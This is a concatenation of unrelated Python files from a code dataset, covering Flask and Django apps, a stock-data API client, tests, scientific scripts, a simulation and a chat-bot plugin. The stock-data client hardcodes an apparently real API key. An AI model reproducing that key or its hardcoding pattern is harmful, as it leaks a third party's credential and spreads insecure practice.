azurecloud.dbo.transactions(BASKET_NUM,HSHD_NUM,PURCHASE,PRODUCT_NUM,SPEND,UNITS,STORE_R,WEEK_NUM,YEAR) VALUES(?,?,?,?,?,?,?,?,?)',row)\r\n else:\r\n errmsg=\"Incorrect file provided. Allowed filenames households.csv or transactions.csv or products.csv\"\r\n conn.commit()\r\n sql_select_query = \"select h.hshd_num, t.basket_num,t.product_num,t.purchase,p.department,p.commodity,t.spend,t.units,t.store_r,t.week_num,t.year,h.L,h.age_range,h.marital,h.income_range,h.homeowner,h.hshd_composition,h.hh_size,h.children from households as h,transactions as t , products as p where h.hshd_num=t.hshd_num and t.product_num=p.product_num and h.hshd_num=10\"\r\n cursor.execute(sql_select_query)\r\n data = cursor.fetchall()\r\n insert_msg=\"Data is inserted successfully in the table\"\r\n conn.close()\r\n if errmsg==None:\r\n return render_template(\"homepage.html\", hshddata=data,insertmsg=insert_msg,tablename=tablename)\r\n else:\r\n return render_template(\"homepage.html\",hshddata=data,errmsg=errmsg)\r\n\r\n\r\n #return render_template('homepage.html')\r\n\r\napp.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"575085698","text":"import requests\nimport pandas as pd\n\n\nclass AlphaVantage:\n\n def __init__(self, symbol_code, interval=\"60min\", outputsize=\"compact\"):\n self.base_url = \"https://www.alphavantage.co\"\n self.default_endpoint = \"/query\"\n self.api_key = \"IE7F2G4JU0O4YP0Y\"\n self.symbol_code = symbol_code\n self.interval = interval\n self.outputsize = outputsize\n\n def intraday(self):\n parameters = {\n \"function\": \"TIME_SERIES_INTRADAY\",\n \"symbol\": self.symbol_code,\n \"interval\": self.interval,\n \"outputsize\": self.outputsize,\n \"datatype\": \"json\",\n \"apikey\": self.api_key\n }\n\n response_intraday = requests.get(\"{0}{1}\".format(self.base_url, self.default_endpoint), params=parameters, stream=True).json()\n\n return response_intraday\n\n def daily(self):\n parameters = {\n \"function\": \"TIME_SERIES_DAILY\",\n \"symbol\": self.symbol_code,\n \"outputsize\": self.outputsize,\n \"datatype\": \"json\",\n \"apikey\": self.api_key\n }\n\n response_daily = requests.get(\"{0}{1}\".format(self.base_url, self.default_endpoint), params=parameters, stream=True).json()\n\n return response_daily","sub_path":"get_historical_data.py","file_name":"get_historical_data.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"389233999","text":"# -*- coding: utf-8 -*-\n# @Time : 6/27/2021 4:36 PM\n# @Author : Paulo Radatz\n# @Email : pradatz@epri.com\n# @File : test_dsselement.py\n# @Software: PyCharm\n\nimport pytest\n\n\nclass TestBus13DSSElement:\n\n @pytest.fixture(autouse=True)\n def _request(self, solve_snap_13bus):\n self.dss = solve_snap_13bus\n self.dss.circuit_set_active_element('Line.671692')\n\n def test_dsselement_num_properties(self):\n expected = 38\n actual = self.dss.dsselement_num_properties()\n assert actual == expected\n\n def test_dsselement_name(self):\n expected = \"Line.671692\"\n actual = self.dss.dsselement_name()\n assert actual == expected\n\n def test_dsselement_all_property_names(self):\n expected = ['bus1', 'bus2', 'linecode', 'length', 'phases', 'r1', 'x1', 'r0', 'x0', 'C1', 'C0', 'rmatrix',\n 'xmatrix', 'cmatrix', 'Switch', 'Rg', 'Xg', 'rho', 'geometry', 'units', 'spacing', 'wires',\n 'EarthModel', 'cncables', 'tscables', 'B1', 'B0', 'Seasons', 'Ratings', 'LineType', 'normamps',\n 'emergamps', 'faultrate', 'pctperm', 'repair', 'basefreq', 'enabled', 'like']\n actual = self.dss.dsselement_all_property_names()\n assert actual == expected\n","sub_path":"tests/py_dss_interface/test_dsselement.py","file_name":"test_dsselement.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"262293755","text":"from django.contrib import admin\nfrom django.urls import path, include\n\n\nurlpatterns = [\n path('api/api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path('admin/', admin.site.urls),\n path('tinymce/', include('tinymce.urls')),\n path('api/v1/', include('main.urls')),\n]\n","sub_path":"appengine/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"135953179","text":"\"\"\"\nConverter for Modbus Mapping\n\"\"\"\n############\n# Standard #\n############\nimport logging\n###############\n# Third Party #\n###############\nimport pandas\nimport numpy as np\n##########\n# Module #\n##########\n\nlogger = logging.getLogger(__name__)\n\n\nclass Converter(object):\n \"\"\"\n Class to convert an Excel file to a complete EPICS modbus mapping\n\n Parameters\n ----------\n handle : str or file-like object\n Path or file-like object containing Modbus mapping\n\n sheet : str, optional\n Name of sheet to read, otherwise the first is used\n\n Attributes\n ----------\n mapping : :class:`.pandas.DataFrame`\n DataFrame representation of mapping\n \"\"\"\n def __init__(self, handle, **kwargs):\n #Save spreasheet information\n self.handle = handle\n self.sheet = kwargs.get('sheet', None)\n #Load Modbus CSV\n self.reload(handle=handle, sheet=kwargs.get('sheet', 0))\n\n\n def reload(self, **kwargs):\n \"\"\"\n Reload the CSV description\n\n Parameters\n ----------\n handle : str or file-like object, optional\n Use a new handle, otherwise the cached handle is used\n\n sheet : str, optional\n Name of sheet to read, otherwise the first is used\n\n Returns\n -------\n mapping : :class:`.pandas.DataFrame`\n DataFrame representation of the map\n \"\"\"\n #Reset handle and sheet if given\n self.handle = kwargs.get('handle', self.handle)\n self.sheet = kwargs.get('sheet', self.sheet)\n\n #Read output\n try:\n self.handle.seek(0)\n self.mapping = pandas.read_excel(self.handle, sheetname=self.sheet,\n index_col=False, header=0)\n except:\n logger.debug(\"Unable to parse as an Excel file, attempting CSV\")\n self.handle.seek(0)\n self.mapping = pandas.read_csv(self.handle, sep=',',\n header=0, index_col=False)\n\n return self.mapping\n\n\n def create_substitutions(self, handle, template,\n start=0, spacing=',\\t'):\n \"\"\"\n Create a substitutions file from the current mapping\n\n Parameters\n ----------\n handle : file-like object\n Output of modbus map\n\n template : :class:`.Template`\n Template object to parse\n\n start : int\n Starting offset of the substitution mapping\n\n spacing : str\n Spacing between columns in the substitutions pattern\n \"\"\"\n #Create a temporary mapping\n df = self.mapping.copy()\n\n #Add offset\n df[template.memory_field] = np.arange(\n start,\n template.memory_size*len(df)+start,\n template.memory_size)\n #Check all keys are accounted\n for key in template.required_fields:\n if key not in df.columns:\n raise KeyError(\"Mapping has no column corresponding to {}\"\n \"\".format(key))\n\n #Replace defaults\n for key, default in template.defaults.items():\n #Add column if not present\n if key not in df.columns:\n df[key] = [default]*len(df)\n #Otherwise only replace missing\n else:\n df[key].replace(np.nan, default, inplace=True)\n\n #Replace all missing information with empty strings \n df.replace(np.nan, '', inplace=True)\n\n #Header for substitutions\n handle.write('file \"%s\" {pattern\\n' % template.fname)\n handle.write('{%s}\\n' % spacing.join(template.header))\n #Iterate through rows\n for row, info in df.iterrows():\n dec = spacing.join(['\"%s\"' % info[key]\n for key in template.header])\n handle.write('{%s}\\n' % dec)\n #Close substitution\n handle.write('}\\n')\n\n\n def create_coils(self, handle, coil, template,\n plc_var='VAR', start=0):\n \"\"\"\n Create a Modbus mapping of the PLC coils\n\n Parameters\n ----------\n handle : file-like object\n Destination for mapping\n\n coil : str\n Name of the coil variable\n\n template : :class:`.Template`\n Template of record type\n\n plc_var : str, optional\n Name of column containing PLC variable name\n\n start : int, optional\n Starting point in memory for mapping\n \"\"\"\n if plc_var not in self.mapping.columns:\n raise ValueError(\"Invalid column {} for PLC variable\"\n \"\".format(plc_var))\n #Create a copy of mapping\n df = self.mapping.copy()\n \n #Add memory address \n df['loc'] = np.arange(start,\n template.memory_size*len(df)+start,\n template.memory_size)\n\n #Add information to file\n for row, info in df.iterrows():\n handle.write(template.declare_in_memory(coil,\n info[plc_var],\n info['loc']))\n","sub_path":"pymod/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"183105547","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\n\n#%% Test functions\n\ndef Himmb(x,y):\n z = ((x**2)+y-11)**2+(x+(y**2)-7)**2\n return(z)\n\ndef sph(x,y):\n z = x**2+y**2\n return(z)\n\ndef McCor(x,y): #-1.5 < x < 4, -3 < y < 4\n z = np.sin(x+y)+(x-y)**(2) -(1.5*x)+(2.5*y)+1\n return(z)\n\ndef Beale(x,y):\n z = (1.5-x+x*y)**2+(2.25-x+x*y**2)**2+(2.625-x+x*y**3)**2\n return(z)\n \ndef GoldP(x,y):\n z = (1+(x+y+1)**(2)*(19-14*x+3*x**2-14*y+6*x*y+3*y**2))*(30+(2*x-3*y)**2 *\n (18-32*x+12*x**2+48*y-36*x*y+27*y**2))\n return(z)\n \ndef Schaffer2(x,y):\n z = 0.5 + (((np.sin(x**2-y**2))**2)-0.5)/((1 +0.001*(x**2+y**2))**2)\n return(z)\n\ndef Levi(x,y):\n z = (np.sin(3*np.pi*x))**2+((x-1)**2)*(1+(np.sin(3*np.pi*y))**2)+((y-1)**2)*(1+(np.sin(2*np.pi*y))**2)\n return(z)\n \n#%% Plotting test functions\ndef PlotFun(f,fx=0,fy=0,fz=-1):\n print(\"Function\", f.__name__)\n x, y = np.linspace(-10, 10, 30), np.linspace(-10, 10, 30)\n X, Y = np.meshgrid(x, y)\n Z = f(X, Y)\n figi = plt.figure()\n ax = plt.axes(projection='3d')\n ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap='rainbow', edgecolor='none')\n ax.set_title(f.__name__)\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n ax.view_init(60, 35)\n #plot results\n solution_found = ax.plot([fx], [fy], [fz], markerfacecolor='y', markeredgecolor='g',\n marker='o', markersize=5, alpha=1.0)\n fx,fy,fz=round(fx,2), round(fy,2), round(fz,2)\n coord=[(fx,fy,fz)]\n \n print(coord)\n ax.legend(solution_found, ['Solution \\n %s ' %coord], numpoints=1, loc='upper left')\n \n\n#%%\n #print(Beale(-0.19,5.68))\n","sub_path":"Sim_Annealing/TestFunctions.py","file_name":"TestFunctions.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"609913913","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[2]:\n\n\n#-------------------------------------------------------------------------------------------------------------------------------\n# By Alexandra Lee (July 2018) \n#\n# Generate input files\n#\n# Dataset: Pseudomonas aeruginosa gene expression compendium referenced in https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5069748/\n# \n# Use map_file to group samples into phenotype groups (condition A and B) based on experimental design annotations\n# Example: control vs treatment with antibiotics\n# \n# Then group samples into training and test sets\n#\n# Generate offset vector using gene expression data in the original space (train_offset_original):\n# average gene expression for condition A - average gene expression for condition B using all genes/dimensions\n#-------------------------------------------------------------------------------------------------------------------------------\nimport os\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import variation\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nrandomState = 123\nfrom numpy.random import seed\nseed(randomState)\n\n\n# In[3]:\n\n\n# load arguments\ndata_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"all-pseudomonas-gene-normalized.zip\")\nmap_file = os.path.join(os.path.dirname(os.getcwd()), \"metadata\", \"mapping_cipro.txt\")\n\n# output files\nfig_file = os.path.join(os.path.dirname(os.getcwd()), \"viz\", \"cipro_treatment\", \"cv.png\")\ntrain_control_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\", \"train_control.txt\")\ntrain_treat_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\", \"train_treat.txt\")\ntest_control_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\",\"test_control.txt\")\ntest_treat_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\", \"test_treat.txt\")\ntrain_input_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\", \"train_model_input.txt.xz\")\noriginal_offset_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\", \"train_offset_original.txt\")\n\n\n# In[4]:\n\n\n# read in data\ndata = pd.read_table(data_file, header = 0, sep = '\\t', index_col = 0, compression='zip')\nX = data.transpose()\nX.head(5)\n\n\n# In[5]:\n\n\n# read in metadata file containing grouping of each sample into training/test and phenotypic group\ngrp = pd.read_table(map_file, header=0, sep='\\t', index_col=None)\ngrp\n\n\n# In[6]:\n\n\n# Group samples into condition A and B based on mapping file provided\ncontrol_all = pd.DataFrame()\ntreat_all = pd.DataFrame()\n\nfor index, row in grp.iterrows():\n if row['Group'] == 'control':\n sample = str(row['Sample ID'])\n control_all = control_all.append(X[X.index.str.contains(sample, regex=False)])\n #print('Training group A {}'.format(sample))\n else:\n sample = str(row['Sample ID'])\n treat_all = treat_all.append(X[X.index.str.contains(sample, regex=False)])\n #print('Training group B {}'.format(sample))\n\n# Split 10% test set randomly\ntest_set_percent = 0.2\ntest_control = control_all.sample(frac=test_set_percent, random_state = randomState)\ntrain_control = control_all.drop(test_control.index)\n\ntest_treat = treat_all.sample(frac=test_set_percent, random_state = randomState)\ntrain_treat = treat_all.drop(test_treat.index)\n\n#control_all\ntrain_treat\n#test_treat\n\n\n# In[7]:\n\n\n# Calculate Coefficient of Variance (CV) to determine variance between samples\n# CV is the standardized measure of dispersion from the mean\ntreat_cv = variation(treat_all, axis = 0)\ntreat_cv = pd.DataFrame(treat_cv, columns = ['cv_treat'])\ntreat_cv.insert(0, 'gene_id', treat_all.columns)\n\ncontrol_cv = variation(control_all, axis = 0)\ncontrol_cv = pd.DataFrame(control_cv, columns = ['cv_control'])\ncontrol_cv.insert(0, 'gene_id', control_all.columns)\n\n# Join \nCV = pd.merge(treat_cv, control_cv, on = 'gene_id')\nCV = pd.melt(CV, id_vars = 'gene_id', var_name = 'group', value_name = 'cv' )\nCV.head(5)\n\n# figure\nfig = plt.figure()\nfg = sns.boxplot(x = 'group', y='cv', hue='group', data=CV, palette=\"Set3\")\nfig.savefig(fig_file)\n\n\n# In[8]:\n\n\n# Create input holding out test test\ninput_holdout = X.drop(test_control.index)\ninput_holdout = input_holdout.drop(test_treat.index)\n\ninput_holdout.head(5)\ninput_holdout.shape\n#X.shape\n\n\n# In[9]:\n\n\n# Average gene expression across samples in training set\ntrain_control_mean = train_control.mean(axis=0)\ntrain_treat_mean = train_treat.mean(axis=0)\n\n# Generate offset using average gene expression in original dataset\ntrain_offset_original = train_treat_mean - train_control_mean\ntrain_offset_original_df = pd.Series.to_frame(train_offset_original).transpose()\ntrain_offset_original_df\n\n\n# In[10]:\n\n\n# Output\ntrain_control.to_csv(train_control_file, sep='\\t')\ntrain_treat.to_csv(train_treat_file, sep='\\t')\n\ntest_control.to_csv(test_control_file, sep='\\t')\ntest_treat.to_csv(test_treat_file, sep='\\t')\n\ntrain_offset_original_df.to_csv(original_offset_file, sep='\\t')\n\ninput_holdout.to_csv(train_input_file, sep='\\t', compression='xz')\n\n","sub_path":"exploration/scripts/nbconverted/generate_input_bool.py","file_name":"generate_input_bool.py","file_ext":"py","file_size_in_byte":5128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"544423271","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import *\nfrom django.conf import settings\nfrom .forms import loginForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom Ressources.models import LocalRess,TypeRess\nimport requests\n\ndef authlogin(request):\n \"\"\"\n Permet la verification du formulaire d'authentification.\n\n On récupère le nom d'utilisateur et le mot de passe puis avec la fonction authenticate on test si les données sont correct.\n\n Si oui on connecte l'utilisateur.\n \n Returns:\n Redirige vers le formulaire de connexion.\n Si le formulaire est valide, redirige vers settings.LOGIN_REDIRECT_URL(configuré sur la vue refreshRess).\n \"\"\"\n\n if request.method == 'POST':\n form = loginForm(request.POST or None)\n if form.is_valid():\n username = request.POST.get('username', False)\n password = request.POST.get('password', False)\n user = authenticate(request, username=username, password=password)\n if user is not None and user.is_active:\n login(request, user)\n return redirect(settings.LOGIN_REDIRECT_URL)\n else:\n form = loginForm()\n\n return render(request, 'accounts/login.html', {'form' : form})\n\n@login_required\ndef authlogout(request):\n \"\"\"\n Deconnecte l'utilisateur courant, un utilisteur doit être connecté\n \n Returns:\n Redirige vers le formulaire de connexion.\n \"\"\"\n\n logout(request)\n\n return redirect('login')\n\ndef refreshRess(request):\n \"\"\"\n Rafraichis la liste des ressources local en l'approvisionnant depuis tous les Type de ressources présent.\n\n Pour chaque Type on recupère le fichier JSON via son endpoint puis pour chaque ressource présente dans ce Type on crée une ressource local (LocalRess) en vérifiant qu'elle n'existe pas déjà.\n\n Returns:\n Redirige vers la page d'accueil\n \"\"\"\n all_type = TypeRess.objects.all()\n for type in all_type:\n content = requests.get(type.endpoint)\n data = content.json()\n for ress in data:\n try:\n unress = LocalRess.objects.get(exid=ress['exid'])\n except LocalRess.DoesNotExist:\n unress = LocalRess()\n unress.type = type\n unress.exid = ress['exid']\n unress.save()\n return redirect('home')\n\n\n\n\"\"\"\ndef refreshUser(request):\n \n VUE PAS UTILISE !\n\n Rafraichis la liste des utilisateurs du service Django actuelle via une requête HTTP vers un autre service.\n Le lien de la rêquete ce modifie via la variable 'url'.\n\n Returns:\n Redirige vers la la liste des LABs.\n\n url = \"http://10.29.248.85:8001/api/users/\"\n content = requests.get(url)\n data = content.json()\n all_users=[]\n for user in data:\n all_users.append((user['username'], user['email'], user['password']))\n\n for user in all_users:\n if user[0] != 'root':\n try:\n unuser = User.objects.get(username=user[0])\n #TODO : Supprimer les utilisateurs pas connecté depuis un certain temps -> if unuser.last_login < ?\n except User.DoesNotExist:\n unuser = User.objects.create_user(user[0], user[1], user[2])\n unuser.save()\n return redirect('LAB_liste')\n\"\"\"\n\n\n","sub_path":"app_LAB/web/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"602099040","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import datetime\r\nimport cv2\r\nimport glob\r\n\r\nstart = datetime.now()\r\nn = 100 # Number of particles\r\nG = 1000 # Gravitational constant\r\nparticle_size = 1 # Particle size, so that 2 particles cannot come closer than this dist\r\ntime_step = 0.1\r\ntotal_time = 36\r\ntotal_steps = int(total_time/time_step)\r\n\r\nx_lim = 1000\r\ny_lim = 1000\r\n\r\nM = 2 * np.random.uniform(low=0.1, high=1, size=(n,))\r\ns = [50*M[n] for n in range(len(M))]\r\nX = x_lim * np.random.rand(n)\r\nY = y_lim * np.random.rand(n)\r\n\r\nF = np.zeros((n, n))\r\nacc_x = np.zeros((n, n))\r\nacc_y = np.zeros((n, n))\r\ntheta = np.zeros((n, n))\r\nux = np.zeros((n, n))\r\nuy = np.zeros((n, n))\r\nsx = np.zeros((n, n))\r\nsy = np.zeros((n, n))\r\nvx = np.zeros((n, n))\r\nvy = np.zeros((n, n))\r\nXt = np.zeros((n, total_steps))\r\nYt = np.zeros((n, total_steps))\r\ncurrent_pos = np.zeros((n, 2))\r\n\r\ncurrent_pos[:, 0] = X\r\ncurrent_pos[:, 1] = Y\r\n\r\nprint('\\n### Boundary Conditions ###')\r\nprint('Number of particles:', n)\r\nprint('Particle size:', particle_size)\r\nprint('Gravitational constant:', G)\r\nprint('End time:', total_time)\r\nprint('Time step:', time_step)\r\nprint('Total steps:', total_steps)\r\n\r\nprint('\\nRunning simulation...')\r\nt = 0\r\nstatus = 0\r\n\r\nfor z in range(total_steps):\r\n status = status + 1\r\n p = np.round((status/total_steps)*100, 2)\r\n print('\\r''Progress:', p, '%', end='')\r\n for i in range(n):\r\n for j in range(n):\r\n if i != j:\r\n r = (X[i] - X[j]) ** 2 + (Y[i] - Y[j]) ** 2\r\n r = max(r, (2 * particle_size))\r\n F[i, j] = (G * M[i] * M[j]) / r\r\n\r\n if X[i] - X[j] == 0:\r\n if (Y[i] - Y[j]) < 0:\r\n theta[i, j] = np.pi/2\r\n else:\r\n theta[i, j] = (3*np.pi)/2\r\n elif Y[i] - Y[j] == 0:\r\n if (X[i] - X[j]) < 0:\r\n theta[i, j] = 0\r\n else:\r\n theta[i, j] = np.pi\r\n elif Y[i] - Y[j] == 0 and X[i] - X[j] == 0:\r\n theta = 0\r\n else:\r\n theta[i, j] = np.arctan(abs(Y[i] - Y[j]) / abs(X[i] - X[j]))\r\n if (X[i] - X[j]) < 0:\r\n if (Y[i] - Y[j]) < 0:\r\n theta[i, j] = theta[i, j] # First Quadrant wrt i\r\n else:\r\n theta[i, j] = (2*np.pi) - theta[i, j] # Fourth Quadrant wrt i\r\n else:\r\n if (Y[i] - Y[j]) < 0:\r\n theta[i, j] = np.pi - theta[i, j]\r\n else:\r\n theta[i, j] = np.pi + theta[i, j]\r\n\r\n Fx = np.multiply(F, np.cos(theta))\r\n Fy = np.multiply(F, np.sin(theta))\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n acc_x[i, j] = Fx[i, j]/M[i]\r\n acc_y[i, j] = Fy[i, j] / M[i]\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n sx[i, j] = (ux[i, j] * time_step) + (0.5 * acc_x[i, j] * time_step * time_step)\r\n sy[i, j] = (uy[i, j] * time_step) + (0.5 * acc_y[i, j] * time_step * time_step)\r\n vx[i, j] = ux[i, j] + (acc_x[i, j] * time_step)\r\n vy[i, j] = uy[i, j] + (acc_y[i, j] * time_step)\r\n if (X[i] - X[j]) ** 2 + (Y[i] - Y[j]) ** 2 <= 2:\r\n if i <= j:\r\n tempx = vx[i]\r\n tempy = vy[i]\r\n vx[i] = ((M[i] - M[j]) / (M[i] + M[j])) * vx[i] + (2 * M[j] / (M[i] + M[j])) * vx[j]\r\n vy[i] = ((M[i] - M[j]) / (M[i] + M[j])) * vy[i] + (2 * M[j] / (M[i] + M[j])) * vy[j]\r\n vx[j] = ((M[j] - M[i]) / (M[j] + M[i])) * vx[j] + (2 * M[i] / (M[j] + M[i])) * tempx\r\n vy[j] = ((M[j] - M[i]) / (M[j] + M[i])) * vy[j] + (2 * M[i] / (M[j] + M[i])) * tempy\r\n\r\n ux = vx.copy()\r\n uy = vy.copy()\r\n\r\n for i in range(n):\r\n X[i] = X[i]+np.sum(sx[i, :])\r\n Y[i] = Y[i] + np.sum(sy[i, :])\r\n if X[i] > x_lim:\r\n X[i] = X[i] - x_lim\r\n if X[i] < 0:\r\n X[i] = x_lim - X[i]\r\n if Y[i] > y_lim:\r\n Y[i] = Y[i] - y_lim\r\n if Y[i] < 0:\r\n Y[i] = y_lim - Y[i]\r\n\r\n Xt[:, z] = X\r\n Yt[:, z] = Y\r\n\r\n t = t + time_step\r\n\r\n plt.scatter(X, Y, s=s, color='black')\r\n plt.xlim([0, 1000])\r\n plt.ylim([0, 1000])\r\n plt.axis('off')\r\n filename = 'frame' + str(status) + '.png'\r\n # sys.stdout.flush()\r\n plt.savefig(filename)\r\n plt.close()\r\n\r\n\r\n","sub_path":"min1.py","file_name":"min1.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"536122017","text":"\"\"\"Play music from stormbot\"\"\"\nimport os\nimport subprocess\nfrom .bot import Plugin\n\n\nclass Music(Plugin):\n def __init__(self, args):\n self.player = args.music_player\n self.path = os.path.abspath(args.music_path)\n self.default = args.music_default\n\n @classmethod\n def argparse(cls, parser):\n parser.add_argument(\"--music-player\", type=str, default=\"paplay\", help=\"Music player (default: %(default)s)\")\n parser.add_argument(\"--music-path\", type=str, default=os.getcwd(), help=\"Music player (default: %(default)s)\")\n parser.add_argument(\"--music-default\", type=str, default=None, help=\"Music player (default: %(default)s)\")\n\n def safe_path(self, path):\n path = os.path.join(self.path, path)\n path = os.path.abspath(path)\n common_prefix = os.path.commonpath([path, self.path])\n return common_prefix == self.path\n\n def parser(self, parser):\n subparser = parser.add_parser('music')\n subparser.set_defaults(command=self.run)\n subparser.add_argument(\"--volume\", type=int, default=65536, help=\"Music player volume (default: %(default)i)\")\n subparser.add_argument(\"music\", type=str, nargs='?', default=self.default,\n help=\"Music to play (default: %(default)s)\")\n\n def run(self, bot, msg, parser, args):\n if not self.safe_path(args.music):\n bot.send_message(mto=msg['from'].bare, mbody=\"Don't try to mess with me !\", mtype='groupchat')\n return\n\n bot.send_message(mto=msg['from'].bare, mbody=\"playing your favorite song out loud !\", mtype='groupchat')\n music = os.path.join(self.path, args.music)\n cmd = [self.player, music]\n subprocess.Popen(cmd, stdin=None, stdout=None, stderr=None, close_fds=True)\n","sub_path":"stormbot/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"108115129","text":"from datetime import date\nimport sys\nimport json\n\nfrom tokenizer import tokenize, queryKey\nfrom constants import *\nimport schema\n\ndef addItemInfo(key, value, arr):\n if not value:\n arr.append(None)\n return\n\n name, color, itemVal, *_ = value.split('|')\n # itemLink format: itemName#|cffCOLOR_RGB|Hitem:itemId:....|\n itemObject = schema.ItemInfo(itemVal.split(':')[1], name[:-1], color[3:])\n arr.append(itemObject)\n\ndef main():\n if len(sys.argv) <= 1:\n return\n\n with open(sys.argv[1]) as f:\n content = f.read()\n with open(\"items.json\", 'w') as writer:\n result = queryKey(content, ('account', 'items'), addItemInfo)\n if not result:\n return\n writer.write(json.dumps(result, default=vars))\n\nmain()\n","sub_path":"parser/itemInfo.py","file_name":"itemInfo.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"18054944","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport os\nimport sys\nimport h5py\nimport numpy as np\nfrom scipy import stats\nimport matplotlib as mpl\n\nmpl.use(\"pgf\")\n\nfrom pgf_style import pgf_with_rc_fonts\n\nmpl.rcParams.update(pgf_with_rc_fonts)\n\nimport matplotlib.pyplot as plt\n\n\ndef draw(input_file_name, height, absorption_image,\n differential_phase_image,\n dark_field_image, fmt=\"pgf\"):\n \"\"\"Display the calculated images with matplotlib.\"\"\"\n absorption_image_title = \"assorbimento\"\n differential_phase_image_title = \"fase differenziale\"\n dark_field_image_title = \"riduzione di visibilit\\\\`a\"\n f, (ax1, ax2, ax3) = plt.subplots(\n 3, 1, sharex=True, figsize=(4.6, height), dpi=300)\n img1 = ax1.imshow(absorption_image,\n cmap=plt.cm.Greys, aspect='auto')\n limits = stats.mstats.mquantiles(absorption_image,\n prob=[0.02, 0.98])\n img1.set_clim(*limits)\n ax1.axis(\"off\")\n ax1.set_title(absorption_image_title, size=\"medium\")\n img2 = ax2.imshow(differential_phase_image)\n limits = stats.mstats.mquantiles(differential_phase_image,\n prob=[0.02, 0.98])\n img2.set_clim(*limits)\n ax2.axis(\"off\")\n ax2.set_title(differential_phase_image_title, size=\"medium\")\n img3 = ax3.imshow(dark_field_image)\n ax3.set_title(dark_field_image_title, size=\"medium\")\n ax3.axis(\"off\")\n limits = stats.mstats.mquantiles(dark_field_image,\n prob=[0.02, 0.98])\n img3.set_clim(*limits)\n plt.tight_layout()\n if absorption_image.shape[0] == 1:\n f, (hist1, hist2, hist3) = plt.subplots(\n 3, 1, sharex=True)\n hist1.hist(range(absorption_image.shape[1]),\n weights=absorption_image.T, fc='w', ec='k')\n hist1.set_title(\"absorption\")\n hist2.hist(range(differential_phase_image.shape[1]),\n weights=differential_phase_image.T, fc='w', ec='k')\n hist2.set_title(\"differential phase\")\n hist3.hist(range(dark_field_image.shape[1]),\n bins=dark_field_image.shape[1],\n weights=dark_field_image.T, fc='w', ec='k')\n hist3.set_title(\"visibility reduction\")\n plt.tight_layout()\n plt.savefig('images_{0}.{1}'.format(\n os.path.splitext(os.path.basename(input_file_name))[0], fmt), dpi=300)\n\nif __name__ == '__main__':\n input_file_name = sys.argv[1]\n height = float(sys.argv[2])\n\n if not os.path.exists(input_file_name):\n raise(OSError(\"{0} not found\".format(input_file_name)))\n\n input_file = h5py.File(input_file_name, \"r\")\n absorption_image_name = \"postprocessing/absorption\"\n differential_phase_image_name = \"postprocessing/differential_phase\"\n visibility_reduction_image_name = \"postprocessing/visibility_reduction\"\n\n absorption_image = input_file[absorption_image_name]\n differential_phase_image = input_file[differential_phase_image_name]\n visibility_reduction_image = input_file[visibility_reduction_image_name]\n\n draw(input_file_name, height, absorption_image,\n differential_phase_image, visibility_reduction_image)\n","sub_path":"images/plot_images.py","file_name":"plot_images.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"221919135","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom blog.feeds import AllArticlesRssFeed\n\n\nurlpatterns = [\n path('', include('blog.urls')),\n path('', include('comment.urls')),\n path('admin/', admin.site.urls),\n path('feeds/', AllArticlesRssFeed(), name='rss'),\n path('search/', include('haystack.urls')),\n path('accounts/', include('allauth.urls')),\n]\n","sub_path":"mydjangoblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} 